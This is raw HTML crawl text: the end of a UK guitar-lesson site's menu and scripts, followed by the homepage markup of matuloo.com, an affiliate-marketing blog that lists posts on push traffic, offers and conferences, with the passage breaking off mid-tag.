menu-item-object-page responsive-menu-pro-item"><a class="responsive-menu-pro-item-link" href="https://www.anyonecanplayguitar.co.uk/recording/" itemprop="url">Recording</a></li></ul></li><li id="responsive-menu-pro-item-2889" class=" menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children responsive-menu-pro-item responsive-menu-pro-item-has-children"><a class="responsive-menu-pro-item-link" href="#" itemprop="url">Contact<div class="responsive-menu-pro-subarrow">▼</div></a><ul data-depth='2' class='responsive-menu-pro-submenu responsive-menu-pro-submenu-depth-1'><li id="responsive-menu-pro-item-792" class=" menu-item menu-item-type-post_type menu-item-object-page responsive-menu-pro-item"><a class="responsive-menu-pro-item-link" href="https://www.anyonecanplayguitar.co.uk/contact/" itemprop="url">Contact Adrian</a></li><li id="responsive-menu-pro-item-2890" class=" menu-item menu-item-type-post_type menu-item-object-page responsive-menu-pro-item"><a class="responsive-menu-pro-item-link" href="https://www.anyonecanplayguitar.co.uk/song-request/" itemprop="url">Song request</a></li></ul></li><li id="responsive-menu-pro-item-793" class=" menu-item menu-item-type-custom menu-item-object-custom responsive-menu-pro-item responsive-menu-pro-desktop-menu-col-auto"><a class="responsive-menu-pro-item-link" href="https://www.facebook.com/anyonecanplayguitar.co.uk" itemprop="url"><i class="fa fa-facebook fa-fw" aria-hidden="true"></i> Facebook</a></li><li id="responsive-menu-pro-item-794" class=" menu-item menu-item-type-custom menu-item-object-custom responsive-menu-pro-item responsive-menu-pro-desktop-menu-col-auto"><a class="responsive-menu-pro-item-link" href="https://twitter.com/acpgtr" itemprop="url"><i class="fa fa-twitter fa-fw" aria-hidden="true"></i> Twitter</a></li><li id="responsive-menu-pro-item-795" class=" menu-item menu-item-type-custom menu-item-object-custom responsive-menu-pro-item responsive-menu-pro-desktop-menu-col-auto"><a class="responsive-menu-pro-item-link" href="https://www.youtube.com/c/anyonecanplayguitarcouk" itemprop="url"><i class="fa fa-youtube fa-fw" aria-hidden="true"></i> YouTube</a></li><li id="responsive-menu-pro-item-810" class=" menu-item menu-item-type-post_type menu-item-object-page responsive-menu-pro-item responsive-menu-pro-desktop-menu-col-auto"><a class="responsive-menu-pro-item-link" href="https://www.anyonecanplayguitar.co.uk/privacy-and-cookies/" itemprop="url">Privacy and Cookies</a></li><li id="responsive-menu-pro-item-809" class=" menu-item menu-item-type-post_type menu-item-object-page responsive-menu-pro-item responsive-menu-pro-desktop-menu-col-auto"><a class="responsive-menu-pro-item-link" href="https://www.anyonecanplayguitar.co.uk/website-terms-and-conditions/" itemprop="url">Website terms and conditions</a></li></ul> <div id="responsive-menu-pro-search-box"> <form action="https://www.anyonecanplayguitar.co.uk" class="responsive-menu-pro-search-form" role="search"> <input type="search" name="s" title="Search" placeholder="Search" class="responsive-menu-pro-search-box"> </form> </div> <div id="responsive-menu-pro-additional-content"></div> </div> </div> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/www.anyonecanplayguitar.co.uk\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='https://www.anyonecanplayguitar.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201919'></script> <script type='text/javascript' src='https://www.anyonecanplayguitar.co.uk/wp-includes/js/hoverIntent.min.js?ver=1.8.1'></script> <script type='text/javascript' src='https://www.anyonecanplayguitar.co.uk/wp-content/themes/genesis/lib/js/menu/superfish.min.js?ver=1.7.10'></script> <script type='text/javascript' src='https://www.anyonecanplayguitar.co.uk/wp-content/themes/genesis/lib/js/menu/superfish.args.min.js?ver=2.9.1'></script> <script type='text/javascript' src='https://www.anyonecanplayguitar.co.uk/wp-content/themes/genesis/lib/js/skip-links.min.js?ver=2.9.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var genesisSampleL10n = {"mainMenu":"Menu","subMenu":"Menu"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.anyonecanplayguitar.co.uk/wp-content/themes/anyonecanplayguitar/js/responsive-menu.js?ver=1.0.0'></script> <script type='text/javascript' src='https://www.anyonecanplayguitar.co.uk/wp-content/plugins/jetpack/_inc/build/widgets/eu-cookie-law/eu-cookie-law.min.js?ver=20180522'></script> <script type='text/javascript' src='https://www.anyonecanplayguitar.co.uk/wp-content/plugins/jetpack/_inc/build/twitter-timeline.min.js?ver=4.0.0'></script> <script type='text/javascript' src='https://www.anyonecanplayguitar.co.uk/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var mc4wp_forms_config = []; /* ]]> */ </script> <script type='text/javascript' src='https://www.anyonecanplayguitar.co.uk/wp-content/plugins/mailchimp-for-wp/assets/js/forms-api.min.js?ver=4.5.0'></script> <!--[if lte IE 9]> <script type='text/javascript' src='https://www.anyonecanplayguitar.co.uk/wp-content/plugins/mailchimp-for-wp/assets/js/third-party/placeholders.min.js?ver=4.5.0'></script> <![endif]--> <script type='text/javascript' src='https://stats.wp.com/e-201919.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.2.1',blog:'123425399',post:'6',tz:'1',srv:'www.anyonecanplayguitar.co.uk'} ]); _stq.push([ 'clickTrackerInit', '123425399', '6' ]); </script> </body></html>
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width,initial-scale=1"> <title>Online Advertising Tips From Matuloo.Com | Affiliate Marketing Strategies and Tips.</title> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="http://www.matuloo.com/xmlrpc.php"> <!-- This site is optimized with the Yoast SEO plugin v9.7 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Affiliate Marketing Strategies and Tips."/> <link rel="canonical" href="http://www.matuloo.com/" /> <link rel="next" href="http://www.matuloo.com/page/2/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Online Advertising Tips From Matuloo.Com | Affiliate Marketing Strategies and Tips." /> <meta property="og:description" content="Affiliate Marketing Strategies and Tips." /> <meta property="og:url" content="http://www.matuloo.com/" /> <meta property="og:site_name" content="Online Advertising Tips From Matuloo.Com" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Affiliate Marketing Strategies and Tips." /> <meta name="twitter:title" content="Online Advertising Tips From Matuloo.Com | Affiliate Marketing Strategies and Tips." /> <meta name="twitter:site" content="@Matuloo_Com" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"http://www.matuloo.com/#website","url":"http://www.matuloo.com/","name":"Online Advertising Tips From Matuloo.Com","potentialAction":{"@type":"SearchAction","target":"http://www.matuloo.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"Person","url":"http://www.matuloo.com/","sameAs":["https://www.facebook.com/matuloocom/","https://twitter.com/Matuloo_Com"],"@id":"#person","name":"Matuloo"}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//secure.gravatar.com' /> <link rel='dns-prefetch' href='//a.optmnstr.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Online Advertising Tips From Matuloo.Com &raquo; Feed" href="http://www.matuloo.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Online Advertising Tips From Matuloo.Com &raquo; Comments Feed" href="http://www.matuloo.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.matuloo.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='http://www.matuloo.com/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='articulla-font-awesome-css' href='http://www.matuloo.com/wp-content/themes/articulla/assets/font-awesome/css/font-awesome.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='articulla-style-css' href='http://www.matuloo.com/wp-content/themes/articulla/style.css?ver=5.1.1' type='text/css' media='all' /> <style id='articulla-style-inline-css' type='text/css'> body{ font-family: "Slabo 27px"; font-size: 18px; }label, input[type="submit"], .featured-post-item .post-date, .featured-post-item .post-title, .carousel-item .carousel-caption .carousel-title, .post .post-header, .post .post-readmore a, .link-pages > span, .link-pages a, .pagination, .post-single .post-taxonomy .post-taxonomy-heading, .post-single .post-share .post-share-heading, .author-info .author-detail .author-name, .comment-body .fn, .comment-body .comment-metadata a, .comment-body .comment-reply-link, .comment-respond .comment-reply-title, .archive-taxonomy h3, .archive-taxonomy h2, .widget .widget-title, .widget_recent_entries li:before, .posts-slider-widget .slider-item .slider-title, .widget-profile .profile-name, .site-footer .colophon { font-family: "Oswald"; }.top-menu, .site-menu, .mobile-menu-list > li > a { font-family: "Oswald"; }.widget-profile .profile-name span, .search-form .search-field { font-family: "Slabo 27px"; }.post .post-title, .carousel-item .carousel-caption .carousel-title { text-transform: uppercase; letter-spacing: 2px; }.post .post-meta { text-transform: uppercase; letter-spacing: 2px; }.site-menu > li > a, .top-menu > li > a { text-transform: uppercase; letter-spacing: 2px; }body { background-color: #e6e7e8; background-image: url( ); background-repeat: repeat; background-attachment: scroll; background-size: auto; background-position: left top; }a, .header-light .site-nav .site-menu > li > a:hover, .post .post-title a:hover, .post-single .post-taxonomy .post-tags a:hover, .author-info .author-detail .author-name a:hover, .comments-section .comment-respond a, .comment-respond #cancel-comment-reply-link:hover, .widget a:hover, .widget_categories li a:hover { color: #c03535; }input[type="submit"]:hover, .top-menu ul, .site-menu ul, .mobile-nav .mobile-menu-anchor, .mobile-menu-list, .featured-posts .owl-pagination .owl-page.active, .owl-carousel .owl-controls .owl-next:hover, .owl-carousel .owl-controls .owl-prev:hover, .post .post-readmore a:hover, .link-pages > span, .link-pages a:hover, .pagination span, .pagination a:hover, .post-single .post-taxonomy .post-category a:hover, .post-single .post-share a:hover, .author-info .author-detail .author-socials a:hover, .widget_tag_cloud .tagcloud a:hover { background: #c03535; }.top-menu ul:after, .site-menu ul:after { border-bottom-color: #c03535; } .post-single .post-taxonomy a:hover, .post-single .post-taxonomy .post-tags a:hover, .widget_tag_cloud .tagcloud a:hover { border-color: #c03535; } </style> <link rel='stylesheet' id='body-font-css' href='http://fonts.googleapis.com/css?family=Slabo+27px%3Aregular&#038;ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='heading-font-css' href='http://fonts.googleapis.com/css?family=Oswald%3A300%2Cregular%2C700&#038;ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='nav-font-css' href='http://fonts.googleapis.com/css?family=Oswald%3A300%2Cregular%2C700&#038;ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='http://www.matuloo.com/wp-content/plugins/jetpack/css/jetpack.css?ver=7.0.1' type='text/css' media='all' /> <script type='text/javascript' src='http://www.matuloo.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://www.matuloo.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' data-cfasync="false" id="omapi-script" async="async" src='https://a.optmnstr.com/app/js/api.min.js'></script> <link rel='https://api.w.org/' href='http://www.matuloo.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.matuloo.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.matuloo.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <link rel='shortlink' href='https://wp.me/8qNff' /> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <link rel='dns-prefetch' href='//i0.wp.com'/> <link rel='dns-prefetch' href='//i1.wp.com'/> <link rel='dns-prefetch' href='//i2.wp.com'/> <style type='text/css'>img#wpstats{display:none}</style> <link href="http://matuloo.com/wp-content/uploads/2016/10/matuloo-favicon.png" rel="shortcut icon" type="image/x-icon" /> <style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <style type="text/css" id="wp-custom-css"> /* You can add your own CSS here. Click the help icon above to learn more. */ blockquote {text-align:left;font-size:1em;padding:0px 60px 0px 40px;} </style> </head> <body class="home blog soft-shadow header-1 header-dark right-sidebar"> <div class="site-wrap"> <div id="top-search" class="top-search"> <div class="container"> <form method="get" action="http://www.matuloo.com/"> <input type="text" class="top-search-input" placeholder="Type and press enter..." name="s"> <a href="#" class="search-anchor-close"><i class="fa fa-remove"></i></a> </form> </div> </div> <div class="site-topbar "> <div class="container cf"> <div class="tagline"> <strong>I'm working in online advertising since 1998 and finally decided to start my own blog.</strong> </div> <div class="top-socials"> <a href="https://www.facebook.com/matuloocom/" title="Facebook"><i class="fa fa-facebook"></i></a> <a href="https://twitter.com/Matuloo_Com" title="Twitter"><i class="fa fa-twitter"></i></a> <a href="#" class="search-anchor"><i class="fa fa-search"></i></a> </div> </div> </div> <header class="site-header"> <div class="container cf"> <div class="branding"> <div class="logo"> <a href="http://www.matuloo.com/" title="Online Advertising Tips From Matuloo.Com"><img src="http://matuloo.com/wp-content/uploads/2016/10/matuloo-logo.png" alt="Online Advertising Tips From Matuloo.Com"></a> </div><!-- .logo --> </div><!-- .branding --> </div><!-- .container --> </header><!-- .site-header --> <nav class="site-nav"> <div class="container nav-container cf"> <div class="site-menu-wrap"> <div class="menu-main-container"><ul id="menu-main" class="site-menu"><li id="menu-item-108" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-108"><a href="http://www.matuloo.com" aria-current="page">HOME</a></li> <li id="menu-item-107" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-107"><a href="http://www.matuloo.com/welcome-to-my-blog-about-affiliate-marketing/">ABOUT ME</a></li> <li id="menu-item-110" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-110"><a href="http://www.matuloo.com/category/basics/">BASICS</a></li> <li id="menu-item-111" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-111"><a href="http://www.matuloo.com/category/traffic/">TRAFFIC</a></li> <li id="menu-item-112" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-112"><a href="http://www.matuloo.com/category/optimization/">OPTIMIZATION</a></li> <li id="menu-item-113" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-113"><a href="http://www.matuloo.com/category/offers/">OFFERS/PRODUCTS</a></li> <li id="menu-item-114" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-114"><a href="http://www.matuloo.com/category/spying/">SPYING</a></li> <li id="menu-item-184" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-184"><a href="http://www.matuloo.com/category/blog-stats/">BLOG STATS</a></li> </ul></div> <div class="mobile-nav cf"> <div class="mobile-menu"> <a href="#" class="mobile-menu-anchor"><i class="fa fa-bars"></i></a> <div class="menu-main-container"><ul id="menu-main-1" class="mobile-menu-list"><li class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-108"><a href="http://www.matuloo.com" aria-current="page">HOME</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-post menu-item-107"><a href="http://www.matuloo.com/welcome-to-my-blog-about-affiliate-marketing/">ABOUT ME</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-110"><a href="http://www.matuloo.com/category/basics/">BASICS</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-111"><a href="http://www.matuloo.com/category/traffic/">TRAFFIC</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-112"><a href="http://www.matuloo.com/category/optimization/">OPTIMIZATION</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-113"><a href="http://www.matuloo.com/category/offers/">OFFERS/PRODUCTS</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-114"><a href="http://www.matuloo.com/category/spying/">SPYING</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-184"><a href="http://www.matuloo.com/category/blog-stats/">BLOG STATS</a></li> </ul></div> </div><!-- .mobile-menu --> <div class="mobile-socials"> <a href="https://www.facebook.com/matuloocom/" title="Facebook"><i class="fa fa-facebook"></i></a> <a href="https://twitter.com/Matuloo_Com" title="Twitter"><i class="fa fa-twitter"></i></a> <a href="#" class="search-anchor"><i class="fa fa-search"></i></a> </div> </div><!-- .mobile-nav --> </div> </div> </nav><!-- .site-nav --> <div class="featured-posts cf"> <div class="featured-posts-carousel"> <article class="carousel-item"> <img src="http://www.matuloo.com/wp-content/uploads/2018/10/megapush-title-500x350.png" alt="How to make profitable campaigns with PUSH notification traffic from Megapu.sh"> <a href="http://www.matuloo.com/how-to-make-profitable-campaigns-with-push-notification-traffic-from-megapu-sh/"> <div class="carousel-caption"> <h2 class="carousel-title"> How to make profitable campaigns with PUSH notification traffic from Megapu.sh </h2> <time datetime="2018-10-23T08:48:07+00:00">Oct 23, 2018</time> </div> </a> </article> <article class="carousel-item"> <img src="http://www.matuloo.com/wp-content/uploads/2018/09/manu-1-500x350.jpg" alt="Meet Manu Cinca, founder of the daily Affiliate Newsletter WTAFF.co &#8230; how it started and where is it going?"> <a href="http://www.matuloo.com/meet-manu-cinca-founder-of-the-daily-affiliate-newsletter-wtaff-co-how-it-started-and-where-is-it-going/"> <div class="carousel-caption"> <h2 class="carousel-title"> Meet Manu Cinca, founder of the daily Affiliate Newsletter WTAFF.co &#8230; how it started and where is it going? </h2> <time datetime="2018-09-04T10:33:15+00:00">Sep 04, 2018</time> </div> </a> </article> <article class="carousel-item"> <img src="http://www.matuloo.com/wp-content/uploads/2018/07/topoffers-header-500x350.png" alt="Promoting exclusive dating offers with TopOffers.Com"> <a href="http://www.matuloo.com/promoting-exclusive-dating-offers-topoffers-com/"> <div class="carousel-caption"> <h2 class="carousel-title"> Promoting exclusive dating offers with TopOffers.Com </h2> <time datetime="2018-07-04T14:03:46+00:00">Jul 04, 2018</time> </div> </a> </article> <article class="carousel-item"> <img src="http://www.matuloo.com/wp-content/uploads/2018/05/baifconf-main-500x350.png" alt="Looking for a higher level Blockchain Conference?"> <a href="http://www.matuloo.com/looking-higher-level-blockchain-conference/"> <div class="carousel-caption"> <h2 class="carousel-title"> Looking for a higher level Blockchain Conference? </h2> <time datetime="2018-05-25T14:05:16+00:00">May 25, 2018</time> </div> </a> </article> <article class="carousel-item"> <img src="http://www.matuloo.com/wp-content/uploads/2017/11/crypto-500x350.jpg" alt="Crypto Currencies – The new mass hysteria, should you join or stay away from it?"> <a href="http://www.matuloo.com/crypto-currencies-new-mass-hysteria-join-or-stay-away/"> <div class="carousel-caption"> <h2 class="carousel-title"> Crypto Currencies – The new mass hysteria, should you join or stay away from it? </h2> <time datetime="2017-11-21T16:02:56+00:00">Nov 21, 2017</time> </div> </a> </article> <article class="carousel-item"> <img src="http://www.matuloo.com/wp-content/uploads/2017/11/facebook-down-500x350.jpg" alt="Facebook is about to kill organic reach of FB pages &#8230; or so it looks like."> <a href="http://www.matuloo.com/facebook-killing-organic-reach-of-fb-pages-looks-like/"> <div class="carousel-caption"> <h2 class="carousel-title"> Facebook is about to kill organic reach of FB pages &#8230; or so it looks like. </h2> <time datetime="2017-11-10T14:03:18+00:00">Nov 10, 2017</time> </div> </a> </article> <article class="carousel-item"> <img src="http://www.matuloo.com/wp-content/uploads/2017/09/bonga-500x350.jpg" alt="Adult Affiliate Marketing in 2017, where is it heading?"> <a href="http://www.matuloo.com/adult-affiliate-marketing-2017-heading/"> <div class="carousel-caption"> <h2 class="carousel-title"> Adult Affiliate Marketing in 2017, where is it heading? </h2> <time datetime="2017-09-21T13:29:26+00:00">Sep 21, 2017</time> </div> </a> </article> <article class="carousel-item"> <img src="http://www.matuloo.com/wp-content/uploads/2017/09/leadbit-2-500x350.jpg" alt="Moscow Affiliate Conference and Party Autumn 2017 Edition."> <a href="http://www.matuloo.com/moscow-affiliate-conference-party-autumn-2017-edition/"> <div class="carousel-caption"> <h2 class="carousel-title"> Moscow Affiliate Conference and Party Autumn 2017 Edition. </h2> <time datetime="2017-09-13T13:57:08+00:00">Sep 13, 2017</time> </div> </a> </article> <article class="carousel-item"> <img src="http://www.matuloo.com/wp-content/uploads/2017/09/what-is-hot-500x350.jpg" alt="What is hot in Affiliate Marketing in the 2nd half of 2017?"> <a href="http://www.matuloo.com/what-is-hot-in-affiliate-marketing-2nd-half-2017/"> <div class="carousel-caption"> <h2 class="carousel-title"> What is hot in Affiliate Marketing in the 2nd half of 2017? </h2> <time datetime="2017-09-06T14:31:38+00:00">Sep 06, 2017</time> </div> </a> </article> <article class="carousel-item"> <img src="http://www.matuloo.com/wp-content/uploads/2017/06/market-main-500x350.jpg" alt="Affiliate Marketing Offers – What can you actually promote as an affiliate marketer?"> <a href="http://www.matuloo.com/affiliate-marketing-offers-can-actually-promote-affiliate-marketer/"> <div class="carousel-caption"> <h2 class="carousel-title"> Affiliate Marketing Offers – What can you actually promote as an affiliate marketer? </h2> <time datetime="2017-06-07T10:06:20+00:00">Jun 07, 2017</time> </div> </a> </article> </div> </div> <div class="site-content"> <div class="container cf"> <div class="content-wrap"> <div class="main-content"> <div class="blogroll cf"><article id="post-657" class="post-657 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized"> <div class="post-wrap cf"> <header class="post-header"> <h2 class="post-title"> <a href="http://www.matuloo.com/whats-working-in-affiliate-marketing-2019-edition/" title="What&#8217;s working in Affiliate Marketing – 2019 Edition.">What&#8217;s working in Affiliate Marketing – 2019 Edition.</a> </h2><!-- .post-title --> <div class="post-meta"> <div class="post-meta-inner"> <span class="meta-item menu-item-author"> <span class="posted-by">Posted By </span> <a href="http://www.matuloo.com/author/matuloo/" title="Posts by Matuloo" rel="author">Matuloo</a> </span> <span class="meta-item menu-item-comment"> <a href="http://www.matuloo.com/whats-working-in-affiliate-marketing-2019-edition/#respond">No Comments</a> </span> <span class="meta-item menu-item-date"> April 15, 2019 </span> </div> </div><!-- .post-meta --> </header> <div class="post-image"> <a href="http://www.matuloo.com/whats-working-in-affiliate-marketing-2019-edition/" title="What&#8217;s working in Affiliate Marketing – 2019 Edition."> <img width="1000" height="544" src="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2019/04/2019report.png?fit=1000%2C544" class="attachment-large size-large wp-post-image" alt="" srcset="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2019/04/2019report.png?w=1000 1000w, https://i2.wp.com/www.matuloo.com/wp-content/uploads/2019/04/2019report.png?resize=300%2C163 300w, https://i2.wp.com/www.matuloo.com/wp-content/uploads/2019/04/2019report.png?resize=768%2C418 768w" sizes="(max-width: 1000px) 100vw, 1000px" data-attachment-id="661" data-permalink="http://www.matuloo.com/whats-working-in-affiliate-marketing-2019-edition/2019report/" data-orig-file="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2019/04/2019report.png?fit=1000%2C544" data-orig-size="1000,544" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="2019report" data-image-description="" data-medium-file="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2019/04/2019report.png?fit=300%2C163" data-large-file="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2019/04/2019report.png?fit=1000%2C544" /> </a> </div> <div class="post-content cf"> <h2 class="western"><a href="https://stmforum.com/whats-working-2019/"><strong>Click here to download the FULL report!</strong></a></h2> <p class="western"><strong>So what&#8217;s the most promising traffic type, vertical or offer type RIGHT NOW?</strong> What segments are growing and which ones are fading out? That&#8217;s the million dollar question that you simply have to know the answer for, unless you want to waste your money and time.</p> <p class="western">Many years ago, <strong>Hugh Hancock (known as Caurmen on STM Forum)</strong> has started the tradition of posting a <strong>What&#8217;s Working in AM</strong> (insert year) thread on the STM forum, outlining the biggest trends in the business, in an attempt to help all the members to focus on areas that showed the most promise for the given year. Needless to say, that these threads were among the <strong>most viewed ones on the forum</strong>, year after year.</p> <p class="western"><strong>Unfortunately,</strong> Hugh has passed away recently as most of you know, but we didn&#8217;t want to let the idea die with him. So we (<strong>Amy-vortex and myself</strong>) decided to continue with this tradition and turn it into something bigger… to honor Hugh and for all of us to remember the good things he did for this industry. That&#8217;s how the “What&#8217;s Working in AM” e-book was born.</p> <div class="post-readmore"><a class="more-link" href="http://www.matuloo.com/whats-working-in-affiliate-marketing-2019-edition/">Continue Reading</a></div></p> </div> </div> </article><article id="post-630" class="post-630 post type-post status-publish format-standard has-post-thumbnail hentry category-case-studies category-guides category-optimization category-uncategorized tag-carousel tag-megapu-sh tag-megapush tag-push-notification tag-push-traffic tag-web-push-notification"> <div class="post-wrap cf"> <header class="post-header"> <h2 class="post-title"> <a href="http://www.matuloo.com/how-to-make-profitable-campaigns-with-push-notification-traffic-from-megapu-sh/" title="How to make profitable campaigns with PUSH notification traffic from Megapu.sh">How to make profitable campaigns with PUSH notification traffic from Megapu.sh</a> </h2><!-- .post-title --> <div class="post-meta"> <div class="post-meta-inner"> <span class="meta-item menu-item-author"> <span class="posted-by">Posted By </span> <a href="http://www.matuloo.com/author/matuloo/" title="Posts by Matuloo" rel="author">Matuloo</a> </span> <span class="meta-item menu-item-comment"> <a href="http://www.matuloo.com/how-to-make-profitable-campaigns-with-push-notification-traffic-from-megapu-sh/#comments">One Comment</a> </span> <span class="meta-item menu-item-date"> October 23, 2018 </span> </div> </div><!-- .post-meta --> </header> <div class="post-image"> <a href="http://www.matuloo.com/how-to-make-profitable-campaigns-with-push-notification-traffic-from-megapu-sh/" title="How to make profitable campaigns with PUSH notification traffic from Megapu.sh"> <img width="1024" height="616" src="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/10/megapush-title.png?fit=1024%2C616" class="attachment-large size-large wp-post-image" alt="" srcset="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/10/megapush-title.png?w=1128 1128w, https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/10/megapush-title.png?resize=300%2C181 300w, https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/10/megapush-title.png?resize=768%2C462 768w, https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/10/megapush-title.png?resize=1024%2C616 1024w" sizes="(max-width: 1024px) 100vw, 1024px" data-attachment-id="649" data-permalink="http://www.matuloo.com/how-to-make-profitable-campaigns-with-push-notification-traffic-from-megapu-sh/megapush-title/" data-orig-file="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/10/megapush-title.png?fit=1128%2C679" data-orig-size="1128,679" data-comments-opened="1" 